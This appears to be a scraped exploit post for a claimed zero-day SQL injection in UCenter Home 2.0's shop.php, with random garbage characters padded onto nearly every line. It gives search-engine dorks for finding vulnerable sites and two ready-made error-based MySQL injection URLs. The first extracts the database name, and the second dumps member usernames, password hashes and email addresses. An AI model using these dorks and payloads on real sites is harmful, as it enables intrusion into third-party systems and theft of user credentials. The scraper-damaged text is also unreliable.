( ` i4 Q$ L: g( C0 W3 H__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ + c8 G0 i# ?* Q; v
" H6 Q4 B7 }4 ?* I
8 H. [% ?8 q. c5 L* w9 o
+ v! j" R' L- |6 }3 Q*/ Author : KnocKout ) T0 [$ A. ]8 X
2 B, O0 \6 x9 n( c
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
9 Y6 X8 z( f7 [; \8 Q) ~
; ? I1 a. p7 D2 f% S! N/ w( H, x) |, c2 v*/ Contact: knockoutr@msn.com
& c2 a' ]6 h) i W/ E$ [+ c4 U& G3 s( q& B
*/ Cyber-Warrior.org/CWKnocKout
) G& B; `6 Q/ @+ t5 \( w
" j5 y/ ~. P7 \5 R# A" {1 s1 ^: S__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
/ C7 H( R& V9 f( I5 _" U9 R$ l9 ~7 p' Z
Script : UCenter Home * U; l; p3 ^: ?7 {
4 F3 S3 U4 u W9 I" N5 P4 u
Version : 2.0 ; f7 u/ u, M' G' s0 g' |5 i
! l0 @1 T5 X2 D
Script HomePage : http://u.discuz.net/
2 E% {) p2 Z6 n: J! \# q' k1 O$ i3 q% P; A/ z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ! j3 B! A2 ]9 i0 q) R
* ~0 ^9 q1 t" ~0 t* tDork : Powered by UCenter inurl:shop.php?ac=view 5 `% B9 s/ N! V! z: e! _5 p( M
6 J2 A& F, s# e$ N% UDork 2 : inurl:shop.php?ac=view&shopid=
; o" ? Y! z$ ]. e- n9 A5 U& Q0 I; G. s4 D' j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ' K |2 \9 m" _# Q6 E6 E
W0 l) l& G' s2 R, @% {, d
Vuln file : Shop.php
+ c; H7 Z/ u) t3 C! g( X( Q: Y; n8 h& {' [& k0 U7 @
value's : (?)ac=view&shopid=
8 m/ ?. p) A8 W9 d% u* \1 q) d( P+ {2 ?+ F! _2 |6 E
Vulnerable Style : SQL Injection (MySQL Error Based) y( X% x: F- r/ Q' s3 p" V
9 k6 K# f) {" A
Need Metarials : Hex Conversion
- Q5 h5 H% g% l
: ~& n5 [! X ]; w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
, d, v5 [9 K) y( C) V9 }+ z0 q9 t+ H
Your Need victim Database name.
! n4 K* x. d: j" l% V% p
$ O7 k1 u( Z( f3 L6 _for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
6 w6 z2 L; z4 e5 V% y8 E5 d; p4 A4 o/ B9 P
.. * V& e0 a( M1 k2 F3 v! ~) _7 k1 f# r5 q
' g- O$ K- ?3 U% u0 J1 B S0 {DB : Okey.
5 \" Z, q" M( p9 z. Q. z
q& r# C4 C4 H5 K `your edit DB `[TARGET DB NAME]` 2 {% K+ B/ M8 j8 r9 @% _
A* v7 i6 \# X3 x& T: O
Example : 'hiwir1_ucenter'
( J5 U9 ~- v: X- J# Q
8 c. `. X# b6 h4 X8 ~' Q3 KEdit : Okey.
! ?! u9 u0 n# [ u i: h6 `& h
9 W, J4 M2 M1 M3 BYour use Hex conversion. And edit Your SQL Injection Exploit..
' b& G; i7 H! f' U
8 b( j) K/ H* G& I; }, \
8 H8 {, A9 `. n+ ~/ v! s0 r2 [2 U4 O8 G- ]4 O$ c2 S* l8 }5 @; X
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
* n3 a1 X' i4 L, Q# l Y8 I |